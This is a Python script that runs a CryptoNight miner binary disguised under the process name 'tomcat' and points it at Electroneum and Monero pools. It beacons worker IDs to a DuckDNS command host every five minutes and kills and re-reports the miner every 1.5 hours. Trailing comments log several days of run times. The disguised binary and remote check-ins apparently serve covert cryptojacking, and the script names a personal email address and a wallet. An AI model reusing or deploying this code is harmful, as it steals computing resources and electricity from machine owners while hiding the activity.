import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:17:07.021174
#2018-02-17 17:06:01.950692
#2018-02-17 18:54:04.106795
#2018-02-17 20:42:01.523929
#2018-02-17 22:28:06.768957
#2018-02-18 00:11:04.946986
#2018-02-18 02:03:03.700484
#2018-02-18 03:51:03.278395
#2018-02-18 05:37:06.822641
#2018-02-18 07:30:07.872978
#2018-02-18 09:18:03.810418
#2018-02-18 11:04:02.182804
#2018-02-18 12:51:06.896099
#2018-02-18 14:39:02.064248
#2018-02-18 16:28:06.491890
#2018-02-18 18:17:06.198731
#2018-02-18 20:02:04.554519
#2018-02-18 21:49:03.756273
#2018-02-18 23:38:04.617657
#2018-02-19 01:24:04.328050
#2018-02-19 03:11:08.083809
#2018-02-19 04:57:06.062268
#2018-02-19 06:42:01.312506
#2018-02-19 08:32:01.861169
#2018-02-19 10:21:06.489732
#2018-02-19 12:09:01.693425
#2018-02-19 13:55:08.560147
#2018-02-19 15:44:09.009226
#2018-02-19 17:32:07.593223
#2018-02-19 19:18:04.512084
#2018-02-19 21:06:06.951651
#2018-02-19 22:53:01.363414
#2018-02-20 00:38:07.001573
#2018-02-20 02:27:05.223958
#2018-02-20 04:19:04.339074
#2018-02-20 06:03:06.364717
#2018-02-20 07:48:07.596164
#2018-02-20 09:33:05.418951
#2018-02-20 11:17:05.538310
#2018-02-20 13:04:01.798390
#2018-02-20 14:48:01.956009
#2018-02-20 16:28:01.634774
#2018-02-20 18:14:01.378475
#2018-02-20 20:05:04.073734
#2018-02-20 21:51:05.780434
#2018-02-20 23:34:01.453218
#2018-02-21 01:17:04.329814
#2018-02-21 03:04:04.370520
#2018-02-21 04:51:04.005920
#2018-02-21 06:40:07.202439
#2018-02-21 08:26:07.389920
#2018-02-21 10:12:01.401259
#2018-02-21 11:59:04.864833
#2018-02-21 13:48:07.937052
#2018-02-21 15:33:08.019413
#2018-02-21 17:23:08.296576
#2018-02-21 19:12:06.353500
#2018-02-21 21:02:01.880357
#2018-02-21 22:48:01.591455
#2018-02-22 00:38:03.664714
#2018-02-22 02:26:01.992288
#2018-02-22 04:13:05.525291
#2018-02-22 05:58:03.839636
#2018-02-22 07:44:07.099267
#2018-02-22 09:32:07.492873
#2018-02-22 11:18:07.514531
#2018-02-22 13:03:06.427099
#2018-02-22 14:49:11.454811
#2018-02-22 16:35:01.633443
#2018-02-22 18:19:08.486772
#2018-02-22 20:09:05.497730
#2018-02-22 21:57:01.600691
#2018-02-22 23:47:04.813482
#2018-02-23 01:34:04.209232
#2018-02-23 03:20:05.957096
#2018-02-23 05:06:01.710718
#2018-02-23 06:51:02.191928
#2018-02-23 08:35:01.482943
#2018-02-23 10:48:13.347800
#2018-02-23 12:46:03.761458
#2018-02-23 14:29:04.022772
#2018-02-23 16:20:08.562324
#2018-02-23 18:08:01.365066
#2018-02-23 19:52:08.953878
#2018-02-23 21:37:05.084424
#2018-02-23 23:25:08.708151
#2018-02-24 01:18:05.431499
#2018-02-24 03:09:06.582088
#2018-02-24 04:55:08.037738
#2018-02-24 06:40:07.606307
#2018-02-24 08:29:06.976811
#2018-02-24 10:16:06.051096
#2018-02-24 12:11:04.406001
#2018-02-24 13:57:05.112210
#2018-02-24 15:49:07.421922
#2018-02-24 17:39:06.042478
#2018-02-24 19:25:06.259062
#2018-02-24 21:16:02.084216
#2018-02-24 23:52:05.190184
#2018-02-25 03:10:07.527888
#2018-02-25 06:56:06.302610